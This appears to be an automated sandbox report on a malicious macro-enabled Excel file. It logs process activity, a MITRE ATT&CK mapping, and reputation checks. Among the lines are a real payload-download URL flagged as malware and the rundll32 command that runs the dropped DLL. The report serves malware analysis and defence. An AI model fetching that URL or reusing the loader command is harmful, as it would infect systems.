    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{5F1BED83-CEAE-4125-B6EB-77C167840732} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Refusal-743510550-01212021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: Refusal-743510550-01212021.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: Refusal-743510550-01212021.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: Refusal-743510550-01212021.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: Refusal-743510550-01212021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: Refusal-743510550-01212021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Refusal-743510550-01212021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: rundll32.exe, 00000003.00000002.256342657.0000000004B50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000003.00000002.256342657.0000000004B50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000003.00000002.256342657.0000000004B50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000003.00000002.256342657.0000000004B50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Replication Through Removable Media1Scripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Replication Through Removable Media1Data from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    toteteca.com10%VirustotalBrowse
    www.toteteca.com6%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.toteteca.com/qzkiodlofm/5555555555.jpg16%VirustotalBrowse
    http://www.toteteca.com/qzkiodlofm/5555555555.jpg100%Avira URL Cloudmalware
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    toteteca.com
    172.107.2.98
    truetrueunknown
    www.toteteca.com
    unknown
    unknowntrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://www.toteteca.com/qzkiodlofm/5555555555.jpgtrue
    • 16%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
      high
      https://login.microsoftonline.com/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
        high
        https://shell.suite.office.com:144347DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
            high
            https://autodiscover-s.outlook.com/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                high
                https://cdn.entity.47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                  high
                  https://wus2-000.contentsync.47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://clients.config.office.net/user/v1.0/tenantassociationkey47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                      high
                      https://powerlift.acompli.net47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v147DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                        high
                        https://cortana.ai47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                  high
                                  https://api.aadrm.com/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                        high
                                        https://cr.office.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/Office47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                              high
                                              https://graph.ppe.windows.net47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://wus2-000.pagecontentsync.47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplate47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetect47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                              high
                                                              https://graph.windows.net47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                          high
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                          high
                                                                                                                          https://ncus-000.contentsync.47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://login.windows.net/common/oauth2/authorize47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                  high
